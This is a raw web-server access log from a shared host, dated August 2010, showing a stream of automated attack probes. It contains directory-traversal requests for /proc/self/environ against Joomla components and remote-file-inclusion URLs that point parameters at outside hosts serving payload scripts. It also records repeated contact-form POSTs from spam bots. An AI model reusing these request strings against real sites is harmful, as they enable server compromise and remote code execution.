195.186.81.84 - - [02/Aug/2010:08:02:07 -0700] "POST /~t290/logs/access.log.0/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "MaMa CaSpEr" 0 www.hypersurf.com
195.186.81.84 - - [02/Aug/2010:08:02:07 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
99.68.172.195 - - [02/Aug/2010:08:03:25 -0700] "GET /~t290/logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.834" 0 www.hypersurf.com
99.68.172.195 - - [02/Aug/2010:08:03:35 -0700] "GET /~t290/logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.834" 0 www.hypersurf.com
72.55.165.45 - - [02/Aug/2010:08:08:28 -0700] "GET /~t290/logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.805" 0 www.hypersurf.com
72.55.165.45 - - [02/Aug/2010:08:08:28 -0700] "GET /~t290/logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.805" 0 www.hypersurf.com
72.55.165.45 - - [02/Aug/2010:08:08:31 -0700] "GET /~t290/logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.805" 0 www.hypersurf.com
72.55.165.45 - - [02/Aug/2010:08:08:35 -0700] "GET /~t290/logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.805" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:49 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:49 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:49 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:50 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:50 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:50 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:50 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:50 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:50 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:50 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:50 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:12:50 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:27:34 -0700] "GET /~t290//skin/zero_vote/error.php?dir=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 311 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 www.hypersurf.com
81.208.34.38 - - [02/Aug/2010:08:27:34 -0700] "GET /~t290/logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.plastmebel.ru//cms/tmp/03804/us/id.txt???? HTTP/1.1" 404 338 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.808" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:27:34 -0700] "GET /~t290/logs/access.log.0%20%20//skin/zero_vote/error.php?dir=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:27:34 -0700] "GET /~t290/logs//skin/zero_vote/error.php?dir=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 www.hypersurf.com
81.208.34.38 - - [02/Aug/2010:08:27:36 -0700] "GET /~t290/logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.plastmebel.ru//cms/tmp/03804/us/id.txt???? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/modules "-" "libwww-perl/5.808" 0 www.hypersurf.com
195.186.81.78 - - [02/Aug/2010:08:29:01 -0700] "GET /~t290/logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.808" 0 www.hypersurf.com
195.186.81.78 - - [02/Aug/2010:08:29:03 -0700] "GET /~t290/logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.808" 0 www.hypersurf.com
81.208.34.38 - - [02/Aug/2010:08:30:14 -0700] "GET /~t290/logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.plastmebel.ru//cms/tmp/03804/us/id.txt???? HTTP/1.1" 404 338 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.808" 0 www.hypersurf.com
81.208.34.38 - - [02/Aug/2010:08:30:16 -0700] "GET /~t290/logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.plastmebel.ru//cms/tmp/03804/us/id.txt???? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/modules "-" "libwww-perl/5.808" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:31:34 -0700] "GET /~t290//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 296 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:31:35 -0700] "GET /~t290/logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "Mozilla/5.0" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:31:36 -0700] "GET /~t290/logs/access.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:31:40 -0700] "GET /~t290//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 296 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:31:40 -0700] "GET /~t290/logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "Mozilla/5.0" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:31:42 -0700] "GET /~t290/logs/access.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:08:32:42 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:08:32:42 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:08:32:42 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:33:25 -0700] "GET /~t290/logs/access.log.0%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 www.hypersurf.com
89.108.64.192 - - [02/Aug/2010:08:33:49 -0700] "GET /~t290/logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 354 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.812" 0 www.hypersurf.com
89.108.64.192 - - [02/Aug/2010:08:33:51 -0700] "GET /~t290/logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs///administrator "-" "libwww-perl/5.812" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:33:55 -0700] "GET /~t290//skin/zero_vote/error.php?dir=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 311 /home/users/t/t290/public_html/skin "-" "Mozilla/5.0" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:33:55 -0700] "GET /~t290/logs//skin/zero_vote/error.php?dir=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 316 /home/users/t/t290/public_html/logs//skin "-" "Mozilla/5.0" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:33:59 -0700] "GET /~t290/logs/access.log.0//skin/zero_vote/error.php?dir=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 329 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:38:07 -0700] "GET /~t290//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 296 /home/users/t/t290/public_html/index.php "-" "Mozilla/5.0" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:38:07 -0700] "GET /~t290/logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "Mozilla/5.0" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:38:08 -0700] "GET /~t290/logs/access.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.hypersurf.com
81.208.34.38 - - [02/Aug/2010:08:38:28 -0700] "GET /~t290/logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.plastmebel.ru//cms/tmp/03804/us/id.txt???? HTTP/1.1" 404 338 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.808" 0 www.hypersurf.com
81.208.34.38 - - [02/Aug/2010:08:38:29 -0700] "GET /~t290/logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.plastmebel.ru//cms/tmp/03804/us/id.txt???? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/modules "-" "libwww-perl/5.808" 0 www.hypersurf.com
59.120.145.13 - - [02/Aug/2010:08:38:36 -0700] "GET /~t290/logs/access.log.0//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://sickinnovations.com/sick/id1.txt??? HTTP/1.1" 404 314 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 www.hypersurf.com
69.167.158.109 - - [02/Aug/2010:08:38:45 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
69.167.158.109 - - [02/Aug/2010:08:38:45 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com /home/users/t/t290/public_html/logs/contact.php69.167.158.109 - - [02/Aug/2010:08:38:45 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:08:39:52 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:08:39:52 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
74.54.41.18 - - [02/Aug/2010:08:39:53 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
99.68.172.195 - - [02/Aug/2010:08:42:46 -0700] "GET /~t290/logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.834" 0 www.hypersurf.com
99.68.172.195 - - [02/Aug/2010:08:42:51 -0700] "GET /~t290/logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.834" 0 www.hypersurf.com
66.71.245.122 - - [02/Aug/2010:08:47:34 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
66.71.245.122 - - [02/Aug/2010:08:47:34 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
66.71.245.122 - - [02/Aug/2010:08:47:35 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
99.68.172.195 - - [02/Aug/2010:08:47:50 -0700] "GET /~t290/logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.834" 0 www.hypersurf.com
99.68.172.195 - - [02/Aug/2010:08:47:54 -0700] "GET /~t290/logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.834" 0 www.hypersurf.com
85.18.11.66 - - [02/Aug/2010:08:49:11 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
85.18.11.66 - - [02/Aug/2010:08:49:11 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
85.18.11.66 - - [02/Aug/2010:08:49:21 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
99.68.172.195 - - [02/Aug/2010:08:50:07 -0700] "GET /~t290/logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 /home/users/t/t290/public_html/logs/access.log "-" "libwww-perl/5.834" 0 www.hypersurf.com
99.68.172.195 - - [02/Aug/2010:08:50:10 -0700] "GET /~t290/logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 /home/users/t/t290/public_html/logs//index.php "-" "libwww-perl/5.834" 0 www.hypersurf.com
66.36.164.33 - - [02/Aug/2010:08:50:17 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 3 www.hypersurf.com
66.36.164.33 - - [02/Aug/2010:08:50:18 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 3 www.hypersurf.com
66.36.164.33 - - [02/Aug/2010:08:50:18 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 3 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:50:42 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:50:42 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com /home/users/t/t290/public_html/logs/access.log
89.253.245.47 - - [02/Aug/2010:08:50:42 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:50:43 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:50:43 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:50:43 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:50:43 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:50:43 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:50:43 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:50:43 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:50:43 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
89.253.245.47 - - [02/Aug/2010:08:50:43 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "plaNETWORK Bot Search" 0 www.hypersurf.com
99.7.55.150 - - [02/Aug/2010:08:51:09 -0700] "GET /~t290/logs/access.log.0/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 347 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.813" 0 www.hypersurf.com
99.7.55.150 - - [02/Aug/2010:08:51:10 -0700] "GET /~t290/logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 /home/users/t/t290/public_html/logs/components "-" "libwww-perl/5.813" 0 www.hypersurf.com
66.36.164.33 - - [02/Aug/2010:08:51:43 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 2 www.hypersurf.com
66.36.164.33 - - [02/Aug/2010:08:51:43 -0700] "POST /~t290/logs/access.log/contact.php HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 2 www.hypersurf.com
66.36.164.33 - - [02/Aug/2010:08:51:44 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 1 www.hypersurf.com
195.186.81.84 - - [02/Aug/2010:08:53:06 -0700] "POST /~t290/logs/access.log.0/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log.0 "-" "MaMa CaSpEr" 0 www.hypersurf.com
195.186.81.84 - - [02/Aug/2010:08:53:06 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
195.186.81.84 - - [02/Aug/2010:08:53:06 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
70.38.11.39 - - [02/Aug/2010:08:55:46 -0700] "GET /~t290/logs/access.log.0%20%20/?sourcedir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 www.hypersurf.com
70.38.11.39 - - [02/Aug/2010:08:55:46 -0700] "GET /~t290/?sourcedir=http://www.irishtoothache.com/ver1? HTTP/1.1" 200 897 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 www.hypersurf.com
70.38.11.39 - - [02/Aug/2010:08:55:46 -0700] "GET /~t290/logs/?sourcedir=http://www.irishtoothache.com/ver1? HTTP/1.1" 200 14129 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:08:56:40 -0700] "GET /~t290/logs/access.log.0%20%20/?sourcedir=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:08:56:40 -0700] "GET /~t290/?sourcedir=http://www.irishtoothache.com/ver1? HTTP/1.1" 200 897 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 www.hypersurf.com
203.147.62.92 - - [02/Aug/2010:08:56:40 -0700] "GET /~t290/logs/?sourcedir=http://www.irishtoothache.com/ver1? HTTP/1.1" 200 14129 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 www.hypersurf.com
204.10.104.1 - - [02/Aug/2010:08:56:43 -0700] "POST /~t290/logs/contact.php HTTP/1.1" 404 302 /home/users/t/t290/public_html/logs/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
204.10.104.1 - - [02/Aug/2010:08:56:43 -0700] "POST /~t290/logs/access.log%20%20/contact.php HTTP/1.1" 404 315 /home/users/t/t290/public_html/logs/access.log "-" "MaMa CaSpEr" 0 www.hypersurf.com
204.10.104.1 - - [02/Aug/2010:08:56:43 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "MaMa CaSpEr" 0 www.hypersurf.com
116.126.87.166 - - [02/Aug/2010:08:57:01 -0700] "POST /~t290/contact.php HTTP/1.1" 404 297 /home/users/t/t290/public_html/contact.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" 0 www.hypersurf.com
